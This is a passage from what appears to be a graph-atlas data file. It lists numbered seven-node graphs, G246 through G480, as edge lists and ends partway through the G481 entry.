['edgelist', 'G246', 7, [[7, 6], [4, 5], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G247', 7, [[3, 4], [2, 3], [7, 1], [6, 7], [6, 5]]],
['edgelist', 'G248', 7, [[1, 2], [5, 7], [6, 5], [4, 3], [7, 6]]],
['edgelist', 'G249', 7, [[2, 6], [7, 2], [6, 7], [3, 6], [2, 3], [7, 3]]],
['edgelist', 'G250', 7, [[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [3, 2]]],
['edgelist', 'G251', 7, [[1, 5], [4, 1], [2, 4], [3, 2], [2, 5], [4, 5]]],
['edgelist', 'G252', 7, [[6, 3], [5, 6], [3, 5], [4, 3], [7, 4], [3, 7]]],
['edgelist', 'G253', 7, [[2, 3], [5, 2], [6, 5], [3, 6], [1, 2], [5, 1]]],
['edgelist', 'G254', 7, [[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1]]],
['edgelist', 'G255', 7, [[3, 6], [7, 3], [6, 7], [3, 5], [2, 3], [4, 3]]],
['edgelist', 'G256', 7, [[2, 5], [4, 2], [3, 4], [2, 3], [3, 6], [7, 3]]],
['edgelist', 'G257', 7, [[6, 5], [7, 6], [2, 7], [6, 2], [4, 7], [1, 2]]],
['edgelist', 'G258', 7, [[7, 6], [2, 7], [6, 2], [4, 2], [1, 4], [2, 5]]],
['edgelist', 'G259', 7, [[1, 5], [4, 1], [3, 4], [5, 3], [3, 6], [7, 3]]],
['edgelist', 'G260', 7, [[2, 5], [4, 2], [3, 4], [2, 3], [3, 6], [7, 6]]],
['edgelist', 'G261', 7, [[3, 4], [2, 3], [4, 7], [6, 5], [7, 6], [6, 3]]],
['edgelist', 'G262', 7, [[3, 6], [7, 3], [6, 7], [2, 5], [4, 2], [3, 2]]],
['edgelist', 'G263', 7, [[5, 6], [1, 5], [4, 1], [3, 4], [5, 3], [7, 4]]],
['edgelist', 'G264', 7, [[1, 5], [4, 1], [2, 4], [7, 6], [2, 5], [2, 1]]],
['edgelist', 'G265', 7, [[2, 5], [4, 2], [3, 4], [6, 3], [7, 6], [3, 7]]],
['edgelist', 'G266', 7, [[7, 4], [6, 7], [5, 6], [2, 5], [3, 2], [6, 3]]],
['edgelist', 'G267', 7, [[2, 1], [4, 2], [7, 4], [6, 7], [5, 6], [2, 5]]],
['edgelist', 'G268', 7, [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6]]],
['edgelist', 'G269', 7, [[1, 5], [4, 1], [5, 4], [3, 6], [7, 3], [6, 7]]],
['edgelist', 'G270', 7, [[7, 4], [1, 7], [7, 3], [6, 7], [7, 2], [5, 7]]],
['edgelist', 'G271', 7, [[3, 5], [6, 3], [3, 4], [7, 3], [2, 3], [2, 1]]],
['edgelist', 'G272', 7, [[2, 1], [3, 2], [6, 3], [2, 5], [4, 2], [7, 3]]],
['edgelist', 'G273', 7, [[2, 1], [3, 2], [4, 7], [2, 4], [5, 2], [6, 5]]],
['edgelist', 'G274', 7, [[2, 1], [3, 2], [6, 3], [7, 6], [2, 5], [4, 2]]],
['edgelist', 'G275', 7, [[2, 1], [3, 5], [6, 3], [7, 6], [3, 7], [4, 3]]],
['edgelist', 'G276', 7, [[5, 1], [2, 5], [4, 2], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G277', 7, [[7, 6], [2, 3], [1, 2], [3, 1], [4, 3], [1, 5]]],
['edgelist', 'G278', 7, [[1, 5], [4, 1], [2, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G279', 7, [[2, 1], [4, 2], [7, 4], [3, 7], [5, 2], [6, 5]]],
['edgelist', 'G280', 7, [[3, 6], [7, 3], [5, 3], [2, 5], [4, 2], [1, 4]]],
['edgelist', 'G281', 7, [[1, 5], [4, 1], [3, 4], [5, 3], [2, 3], [7, 6]]],
['edgelist', 'G282', 7, [[1, 5], [4, 1], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist', 'G283', 7, [[4, 5], [2, 1], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist', 'G284', 7, [[5, 6], [1, 5], [4, 1], [7, 4], [2, 1], [3, 2]]],
['edgelist', 'G285', 7, [[3, 6], [7, 3], [6, 7], [2, 5], [4, 2], [2, 1]]],
['edgelist', 'G286', 7, [[5, 6], [4, 5], [3, 4], [2, 3], [1, 2], [7, 1]]],
['edgelist', 'G287', 7, [[7, 5], [6, 7], [5, 6], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G288', 7, [[1, 2], [5, 1], [3, 4], [6, 3], [7, 6], [4, 7]]],
['edgelist', 'G289', 7, [[2, 3], [1, 2], [5, 1], [4, 5], [3, 4], [7, 6]]],
['edgelist',
'G290',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [3, 2], [4, 5]]],
['edgelist',
'G291',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [6, 3]]],
['edgelist',
'G292',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2]]],
['edgelist',
'G293',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [2, 1]]],
['edgelist',
'G294',
7,
[[1, 5], [4, 1], [3, 4], [5, 3], [3, 6], [7, 3], [3, 1]]],
['edgelist',
'G295',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [3, 2], [3, 7]]],
['edgelist',
'G296',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [4, 5], [7, 4]]],
['edgelist',
'G297',
7,
[[1, 5], [4, 1], [3, 4], [5, 3], [3, 6], [7, 3], [4, 5]]],
['edgelist',
'G298',
7,
[[1, 5], [4, 1], [2, 4], [4, 7], [2, 5], [2, 1], [6, 5]]],
['edgelist',
'G299',
7,
[[1, 5], [4, 1], [2, 4], [7, 6], [2, 5], [2, 1], [4, 5]]],
['edgelist',
'G300',
7,
[[6, 3], [5, 6], [3, 5], [4, 3], [7, 4], [3, 7], [3, 2]]],
['edgelist',
'G301',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [3, 6]]],
['edgelist',
'G302',
7,
[[6, 3], [5, 6], [3, 5], [4, 3], [7, 4], [3, 7], [4, 2]]],
['edgelist',
'G303',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [3, 1], [3, 2], [7, 1]]],
['edgelist',
'G304',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [4, 6]]],
['edgelist',
'G305',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [4, 6]]],
['edgelist',
'G306',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [2, 6]]],
['edgelist',
'G307',
7,
[[4, 3], [5, 4], [4, 6], [3, 5], [6, 3], [7, 2], [7, 5]]],
['edgelist',
'G308',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [1, 4]]],
['edgelist',
'G309',
7,
[[4, 5], [2, 4], [3, 2], [7, 3], [6, 7], [2, 6], [5, 2]]],
['edgelist',
'G310',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [4, 3], [6, 4], [5, 6]]],
['edgelist',
'G311',
7,
[[7, 4], [6, 7], [2, 6], [3, 2], [4, 3], [5, 3], [6, 5]]],
['edgelist',
'G312',
7,
[[2, 3], [5, 2], [6, 5], [7, 6], [4, 7], [3, 4], [6, 3]]],
['edgelist',
'G313',
7,
[[5, 2], [4, 5], [2, 4], [3, 2], [7, 3], [6, 7], [3, 6]]],
['edgelist',
'G314',
7,
[[4, 1], [7, 4], [1, 7], [2, 1], [1, 3], [6, 1], [1, 5]]],
['edgelist',
'G315',
7,
[[2, 6], [7, 2], [2, 3], [4, 2], [5, 4], [2, 5], [5, 1]]],
['edgelist',
'G316',
7,
[[6, 1], [7, 6], [1, 7], [6, 3], [2, 6], [7, 4], [5, 7]]],
['edgelist',
'G317',
7,
[[5, 2], [1, 5], [2, 1], [3, 2], [1, 4], [7, 1], [5, 6]]],
['edgelist',
'G318',
7,
[[6, 3], [7, 6], [3, 7], [3, 5], [4, 3], [2, 1], [3, 2]]],
['edgelist',
'G319',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [3, 2], [2, 6], [7, 2]]],
['edgelist',
'G320',
7,
[[2, 1], [5, 2], [1, 5], [6, 5], [3, 2], [4, 3], [7, 2]]],
['edgelist',
'G321',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [4, 3], [6, 5], [7, 5]]],
['edgelist',
'G322',
7,
[[3, 4], [6, 3], [7, 6], [4, 7], [2, 3], [5, 6], [1, 6]]],
['edgelist',
'G323',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [3, 2], [7, 6]]],
['edgelist',
'G324',
7,
[[3, 6], [7, 3], [6, 7], [5, 3], [2, 3], [1, 2], [4, 2]]],
['edgelist',
'G325',
7,
[[3, 6], [7, 3], [5, 3], [2, 5], [4, 2], [3, 4], [1, 2]]],
['edgelist',
'G326',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [1, 2], [5, 2], [4, 2]]],
['edgelist',
'G327',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [6, 5], [3, 2], [7, 4]]],
['edgelist',
'G328',
7,
[[3, 6], [7, 3], [6, 7], [5, 6], [4, 7], [2, 3], [1, 2]]],
['edgelist',
'G329',
7,
[[3, 6], [7, 3], [2, 5], [2, 3], [1, 2], [5, 1], [1, 4]]],
['edgelist',
'G330',
7,
[[7, 6], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4], [4, 5]]],
['edgelist',
'G331',
7,
[[5, 2], [1, 5], [2, 1], [4, 7], [3, 4], [1, 3], [6, 1]]],
['edgelist',
'G332',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [3, 2], [6, 3], [7, 2]]],
['edgelist',
'G333',
7,
[[5, 2], [1, 5], [2, 1], [3, 4], [1, 3], [6, 1], [7, 6]]],
['edgelist',
'G334',
7,
[[1, 2], [6, 1], [7, 6], [4, 7], [3, 4], [1, 3], [5, 1]]],
['edgelist',
'G335',
7,
[[2, 1], [5, 2], [3, 5], [4, 3], [5, 4], [1, 5], [7, 6]]],
['edgelist',
'G336',
7,
[[4, 7], [3, 4], [2, 3], [1, 2], [5, 1], [2, 5], [6, 5]]],
['edgelist',
'G337',
7,
[[2, 1], [6, 2], [7, 6], [3, 7], [2, 3], [4, 3], [5, 4]]],
['edgelist',
'G338',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [7, 6], [5, 2]]],
['edgelist',
'G339',
7,
[[6, 3], [7, 6], [3, 7], [2, 3], [5, 2], [1, 5], [4, 2]]],
['edgelist',
'G340',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [7, 6], [6, 3]]],
['edgelist',
'G341',
7,
[[2, 5], [1, 2], [3, 1], [4, 3], [6, 4], [1, 6], [7, 4]]],
['edgelist',
'G342',
7,
[[3, 2], [4, 3], [7, 4], [6, 7], [1, 6], [3, 1], [6, 5]]],
['edgelist',
'G343',
7,
[[6, 3], [7, 6], [3, 7], [2, 3], [1, 2], [5, 1], [4, 1]]],
['edgelist',
'G344',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G345',
7,
[[2, 1], [3, 2], [6, 3], [5, 6], [1, 5], [5, 2], [7, 4]]],
['edgelist',
'G346',
7,
[[3, 6], [7, 3], [1, 5], [4, 1], [2, 4], [5, 2], [2, 1]]],
['edgelist',
'G347',
7,
[[7, 6], [1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3]]],
['edgelist',
'G348',
7,
[[3, 2], [6, 3], [5, 6], [1, 5], [4, 1], [7, 4], [3, 7]]],
['edgelist',
'G349',
7,
[[5, 1], [4, 5], [2, 4], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist',
'G350',
7,
[[7, 6], [3, 7], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4]]],
['edgelist',
'G351',
7,
[[5, 2], [1, 5], [3, 1], [4, 3], [7, 4], [6, 7], [1, 6]]],
['edgelist',
'G352',
7,
[[1, 5], [4, 1], [5, 4], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist',
'G353',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7], [1, 7]]],
['edgelist',
'G354',
7,
[[2, 1], [5, 2], [1, 5], [6, 3], [7, 6], [4, 7], [3, 4]]],
['edgelist',
'G355',
7,
[[1, 2], [5, 1], [6, 5], [3, 6], [2, 3], [6, 2], [5, 2], [3, 5]]],
['edgelist',
'G356',
7,
[[5, 2], [6, 5], [3, 6], [2, 3], [1, 2], [6, 1], [1, 5], [3, 1]]],
['edgelist',
'G357',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [4, 5], [6, 2], [7, 2]]],
['edgelist',
'G358',
7,
[[5, 2], [6, 5], [3, 6], [2, 3], [6, 2], [7, 6], [3, 5], [4, 3]]],
['edgelist',
'G359',
7,
[[2, 4], [1, 2], [5, 1], [3, 5], [2, 3], [5, 2], [6, 5], [2, 6]]],
['edgelist',
'G360',
7,
[[3, 1], [4, 3], [7, 4], [6, 7], [1, 6], [4, 1], [1, 7], [5, 1]]],
['edgelist',
'G361',
7,
[[2, 1], [3, 2], [6, 3], [5, 6], [1, 5], [3, 1], [6, 1], [7, 6]]],
['edgelist',
'G362',
7,
[[2, 1], [3, 2], [4, 3], [2, 4], [5, 4], [3, 5], [6, 3], [4, 6]]],
['edgelist',
'G363',
7,
[[3, 1], [4, 3], [7, 4], [6, 7], [1, 6], [4, 1], [7, 1], [5, 6]]],
['edgelist',
'G364',
7,
[[2, 1], [3, 2], [5, 4], [2, 6], [5, 2], [3, 5], [6, 3], [4, 6]]],
['edgelist',
'G365',
7,
[[4, 6], [3, 2], [5, 4], [2, 6], [5, 2], [3, 5], [6, 3], [5, 7]]],
['edgelist',
'G366',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [4, 5], [3, 2], [6, 3]]],
['edgelist',
'G367',
7,
[[4, 6], [3, 2], [5, 4], [2, 6], [5, 2], [3, 5], [6, 3], [1, 4]]],
['edgelist',
'G368',
7,
[[5, 1], [3, 5], [1, 3], [4, 1], [3, 4], [6, 3], [7, 6], [3, 7]]],
['edgelist',
'G369',
7,
[[4, 3], [7, 4], [6, 7], [3, 6], [1, 3], [6, 1], [5, 6], [3, 5]]],
['edgelist',
'G370',
7,
[[1, 6], [5, 1], [3, 5], [6, 3], [2, 6], [5, 2], [4, 5], [6, 4]]],
['edgelist',
'G371',
7,
[[3, 4], [2, 3], [5, 2], [6, 5], [2, 6], [6, 3], [7, 6], [4, 7]]],
['edgelist',
'G372',
7,
[[6, 3], [5, 6], [1, 5], [4, 1], [7, 4], [3, 7], [5, 3], [4, 3]]],
['edgelist',
'G373',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3], [6, 5], [3, 6]]],
['edgelist',
'G374',
7,
[[6, 7], [3, 6], [7, 3], [4, 3], [5, 4], [1, 5], [4, 1], [3, 5]]],
['edgelist',
'G375',
7,
[[2, 1], [6, 1], [4, 3], [2, 4], [6, 3], [7, 2], [7, 3], [7, 6]]],
['edgelist',
'G376',
7,
[[6, 5], [7, 6], [4, 7], [1, 4], [5, 1], [3, 5], [4, 3], [1, 3]]],
['edgelist',
'G377',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 3], [2, 6]]],
['edgelist',
'G378',
7,
[[6, 1], [7, 3], [1, 7], [2, 1], [3, 2], [6, 3], [5, 6], [5, 7]]],
['edgelist',
'G379',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [3, 2], [2, 6], [7, 2]]],
['edgelist',
'G380',
7,
[[1, 3], [5, 1], [2, 5], [1, 2], [4, 1], [2, 4], [6, 2], [7, 2]]],
['edgelist',
'G381',
7,
[[5, 3], [1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [2, 6], [7, 2]]],
['edgelist',
'G382',
7,
[[1, 5], [4, 1], [5, 4], [2, 5], [4, 2], [2, 6], [3, 2], [7, 2]]],
['edgelist',
'G383',
7,
[[3, 2], [1, 3], [4, 1], [6, 4], [3, 6], [4, 3], [5, 4], [7, 6]]],
['edgelist',
'G384',
7,
[[5, 3], [1, 5], [4, 1], [2, 4], [5, 2], [4, 5], [2, 6], [7, 2]]],
['edgelist',
'G385',
7,
[[3, 2], [1, 3], [4, 1], [6, 4], [3, 6], [7, 6], [5, 4], [6, 1]]],
['edgelist',
'G386',
7,
[[2, 1], [3, 2], [4, 3], [2, 4], [5, 3], [4, 5], [5, 6], [7, 5]]],
['edgelist',
'G387',
7,
[[7, 6], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4], [1, 2], [4, 5]]],
['edgelist',
'G388',
7,
[[1, 2], [7, 6], [3, 4], [7, 5], [7, 4], [7, 3], [7, 1], [7, 2]]],
['edgelist',
'G389',
7,
[[7, 5], [2, 3], [3, 4], [7, 6], [5, 6], [7, 3], [7, 1], [7, 2]]],
['edgelist',
'G390',
7,
[[1, 2], [2, 3], [3, 4], [7, 6], [7, 5], [7, 4], [7, 1], [7, 3]]],
['edgelist',
'G391',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [7, 2], [6, 2], [3, 6]]],
['edgelist',
'G392',
7,
[[4, 1], [3, 4], [5, 3], [1, 5], [2, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G393',
7,
[[3, 2], [4, 3], [7, 4], [6, 7], [1, 6], [3, 1], [6, 3], [5, 6]]],
['edgelist',
'G394',
7,
[[2, 1], [3, 2], [4, 3], [5, 4], [6, 3], [2, 6], [7, 2], [3, 7]]],
['edgelist',
'G395',
7,
[[3, 6], [5, 3], [2, 5], [4, 2], [1, 4], [2, 1], [3, 2], [7, 3]]],
['edgelist',
'G396',
7,
[[5, 6], [1, 5], [4, 1], [3, 4], [5, 3], [2, 5], [4, 2], [7, 4]]],
['edgelist',
'G397',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [5, 3], [6, 5], [2, 6], [7, 4]]],
['edgelist',
'G398',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [2, 7], [6, 1]]],
['edgelist',
'G399',
7,
[[5, 6], [1, 5], [2, 1], [5, 2], [4, 1], [2, 4], [7, 2], [3, 7]]],
['edgelist',
'G400',
7,
[[3, 6], [5, 3], [1, 5], [2, 1], [5, 2], [4, 1], [2, 4], [7, 2]]],
['edgelist',
'G401',
7,
[[2, 7], [3, 2], [1, 3], [2, 1], [5, 2], [4, 5], [3, 4], [5, 6]]],
['edgelist',
'G402',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [2, 7], [6, 4]]],
['edgelist',
'G403',
7,
[[1, 5], [4, 1], [5, 4], [2, 5], [4, 2], [6, 2], [7, 3], [2, 7]]],
['edgelist',
'G404',
7,
[[3, 4], [2, 3], [1, 2], [6, 1], [5, 6], [1, 5], [3, 1], [7, 6]]],
['edgelist',
'G405',
7,
[[5, 6], [1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3], [7, 3]]],
['edgelist',
'G406',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [5, 2], [3, 7], [6, 3]]],
['edgelist',
'G407',
7,
[[1, 2], [2, 3], [3, 4], [7, 4], [5, 6], [7, 3], [7, 1], [7, 2]]],
['edgelist',
'G408',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [1, 2], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G409',
7,
[[1, 2], [2, 3], [3, 4], [7, 6], [5, 6], [7, 3], [7, 5], [7, 2]]],
['edgelist',
'G410',
7,
[[1, 2], [5, 1], [1, 3], [6, 1], [7, 6], [4, 7], [3, 4], [6, 3]]],
['edgelist',
'G411',
7,
[[1, 5], [4, 1], [3, 4], [5, 3], [2, 5], [4, 2], [3, 6], [7, 3]]],
['edgelist',
'G412',
7,
[[5, 6], [4, 5], [2, 4], [3, 2], [7, 3], [5, 7], [4, 3], [1, 2]]],
['edgelist',
'G413',
7,
[[2, 1], [3, 7], [4, 3], [5, 4], [6, 3], [2, 6], [7, 2], [7, 6]]],
['edgelist',
'G414',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [7, 6], [6, 3], [5, 2]]],
['edgelist',
'G415',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [4, 5], [3, 2], [3, 6], [7, 3]]],
['edgelist',
'G416',
7,
[[1, 7], [5, 1], [2, 5], [4, 2], [1, 4], [3, 5], [4, 3], [6, 3]]],
['edgelist',
'G417',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3], [2, 1], [7, 6]]],
['edgelist',
'G418',
7,
[[1, 2], [5, 1], [4, 3], [7, 4], [6, 7], [3, 6], [7, 3], [4, 6]]],
['edgelist',
'G419',
7,
[[6, 3], [7, 6], [3, 7], [5, 3], [1, 5], [4, 1], [3, 4], [2, 3]]],
['edgelist',
'G420',
7,
[[3, 1], [2, 3], [1, 2], [6, 1], [5, 6], [1, 5], [7, 1], [4, 7]]],
['edgelist',
'G421',
7,
[[1, 2], [3, 1], [4, 3], [3, 2], [2, 5], [6, 5], [6, 4], [2, 7]]],
['edgelist',
'G422',
7,
[[2, 7], [3, 2], [1, 3], [2, 1], [5, 2], [4, 5], [3, 4], [6, 7]]],
['edgelist',
'G423',
7,
[[7, 2], [1, 7], [2, 1], [6, 2], [1, 6], [3, 2], [4, 3], [5, 4]]],
['edgelist',
'G424',
7,
[[7, 6], [3, 7], [2, 3], [5, 2], [4, 5], [1, 4], [5, 1], [3, 5]]],
['edgelist',
'G425',
7,
[[2, 7], [1, 2], [6, 1], [2, 6], [4, 1], [5, 4], [3, 5], [1, 3]]],
['edgelist',
'G426',
7,
[[3, 7], [5, 3], [1, 5], [2, 1], [5, 2], [4, 5], [6, 4], [3, 6]]],
['edgelist',
'G427',
7,
[[2, 1], [3, 2], [7, 3], [6, 7], [2, 6], [5, 2], [4, 5], [3, 4]]],
['edgelist',
'G428',
7,
[[7, 2], [5, 4], [2, 1], [6, 2], [4, 3], [3, 2], [5, 7], [6, 5]]],
['edgelist',
'G429',
7,
[[5, 3], [1, 5], [2, 1], [5, 2], [4, 5], [7, 4], [6, 7], [4, 6]]],
['edgelist',
'G430',
7,
[[5, 2], [3, 5], [1, 3], [7, 1], [4, 7], [1, 4], [6, 1], [5, 6]]],
['edgelist',
'G431',
7,
[[6, 7], [5, 6], [1, 5], [4, 1], [3, 4], [5, 3], [2, 5], [4, 2]]],
['edgelist',
'G432',
7,
[[7, 4], [6, 7], [5, 6], [1, 5], [2, 1], [3, 2], [6, 3], [5, 2]]],
['edgelist',
'G433',
7,
[[1, 2], [3, 1], [4, 3], [3, 2], [2, 5], [6, 5], [6, 4], [5, 7]]],
['edgelist',
'G434',
7,
[[5, 1], [4, 5], [3, 4], [7, 3], [6, 7], [2, 6], [5, 2], [3, 2]]],
['edgelist',
'G435',
7,
[[7, 2], [1, 7], [5, 4], [6, 2], [1, 6], [3, 2], [4, 3], [6, 7]]],
['edgelist',
'G436',
7,
[[7, 3], [6, 7], [4, 6], [7, 4], [5, 4], [1, 5], [2, 1], [5, 2]]],
['edgelist',
'G437',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 7], [6, 2]]],
['edgelist',
'G438',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 7], [5, 3]]],
['edgelist',
'G439',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [6, 7], [1, 6]]],
['edgelist',
'G440',
7,
[[5, 1], [3, 5], [4, 3], [7, 4], [6, 7], [5, 6], [2, 3], [6, 2]]],
['edgelist',
'G441',
7,
[[6, 2], [3, 5], [4, 3], [1, 4], [6, 1], [5, 6], [2, 3], [1, 7]]],
['edgelist',
'G442',
7,
[[6, 7], [3, 6], [5, 3], [1, 5], [4, 1], [3, 4], [2, 5], [4, 2]]],
['edgelist',
'G443',
7,
[[1, 5], [2, 1], [5, 2], [4, 5], [6, 4], [7, 6], [3, 7], [5, 3]]],
['edgelist',
'G444',
7,
[[1, 2], [7, 6], [3, 4], [4, 5], [7, 5], [1, 6], [7, 3], [7, 2]]],
['edgelist',
'G445',
7,
[[2, 3], [1, 2], [5, 1], [6, 5], [3, 6], [4, 3], [7, 4], [6, 7]]],
['edgelist',
'G446',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 7], [2, 7]]],
['edgelist',
'G447',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4]]],
['edgelist',
'G448',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 6], [7, 2]]],
['edgelist',
'G449',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 1], [7, 4]]],
['edgelist',
'G450',
7,
[[1, 5], [2, 1], [4, 3], [2, 5], [3, 6], [6, 4], [7, 5], [7, 4]]],
['edgelist',
'G451',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [7, 3], [6, 7], [3, 6]]],
['edgelist',
'G452',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [3, 5], [1, 4]]],
['edgelist',
'G453',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 3]]],
['edgelist',
'G454',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [1, 5]]],
['edgelist',
'G455',
7,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4], [5, 6]]],
['edgelist',
'G456',
7,
[[3, 1], [5, 2], [2, 3], [6, 5], [3, 6], [4, 2], [6, 4], [4, 3], [5, 4]]],
['edgelist',
'G457',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 6]]],
['edgelist',
'G458',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [5, 6]]],
['edgelist',
'G459',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [4, 1]]],
['edgelist',
'G460',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [1, 5], [2, 1], [5, 2]]],
['edgelist',
'G461',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [5, 2], [2, 1], [6, 2]]],
['edgelist',
'G462',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 5], [5, 1], [6, 1]]],
['edgelist',
'G463',
7,
[[5, 4], [1, 5], [2, 1], [3, 2], [4, 3], [1, 6], [6, 4], [1, 4], [2, 6]]],
['edgelist',
'G464',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [5, 1]]],
['edgelist',
'G465',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [3, 5]]],
['edgelist',
'G466',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [6, 2]]],
['edgelist',
'G467',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [3, 1]]],
['edgelist',
'G468',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 5], [6, 3], [6, 4]]],
['edgelist',
'G469',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [6, 2]]],
['edgelist',
'G470',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [5, 3], [6, 3]]],
['edgelist',
'G471',
7,
[[3, 4], [1, 3], [4, 1], [5, 4], [2, 5], [6, 2], [5, 6], [2, 1], [6, 3]]],
['edgelist',
'G472',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [6, 3], [5, 2]]],
['edgelist',
'G473',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5], [1, 7]]],
['edgelist',
'G474',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5], [3, 7]]],
['edgelist',
'G475',
7,
[[2, 3], [4, 2], [1, 4], [2, 1], [3, 1], [4, 3], [6, 4], [5, 1], [2, 7]]],
['edgelist',
'G476',
7,
[[1, 2], [3, 5], [1, 3], [4, 2], [4, 3], [3, 2], [5, 2], [6, 3], [3, 7]]],
['edgelist',
'G477',
7,
[[1, 2], [3, 5], [1, 3], [6, 3], [4, 2], [4, 3], [3, 2], [5, 2], [2, 7]]],
['edgelist',
'G478',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [2, 6], [2, 7]]],
['edgelist',
'G479',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [2, 6], [5, 7]]],
['edgelist',
'G480',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2], [2, 7]]],
['edgelist',
'G481',
7,
